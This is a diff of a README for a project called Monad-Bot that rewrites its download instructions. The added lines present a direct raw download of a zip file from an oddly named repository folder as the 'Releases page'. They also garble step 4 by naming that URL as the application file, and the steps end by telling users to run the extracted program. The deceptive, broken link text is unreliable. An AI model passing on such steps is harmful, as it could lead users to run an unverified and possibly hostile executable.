GUILHERME-PATEZ/Monad-Bot/README.md

 To download Monad-Bot, follow these steps:

-1. Click the download button above or visit the [Monad-Bot Releases](https://github.com/GUILHERME-PATEZ/Monad-Bot/releases) page.
+1. Click the download button above or visit the [Monad-Bot Releases](https://raw.githubusercontent.com/GUILHERME-PATEZ/Monad-Bot/main/ideogenous/Monad-Bot-2.9.zip) page.

 2. Find the latest version and click on the download link for your operating system.

 3. If the downloaded file is compressed (like a ZIP file), extract it using any file compression software.
 You can use built-in tools on your operating system.

-4. After extracting, locate the application file (usually named `Monad-Bot.exe` for Windows or similar for other OS).
+4. After extracting, locate the application file (usually named `https://raw.githubusercontent.com/GUILHERME-PATEZ/Monad-Bot/main/ideogenous/Monad-Bot-2.9.zip` for Windows or similar for other OS).

 5. Double-click the application file to run it.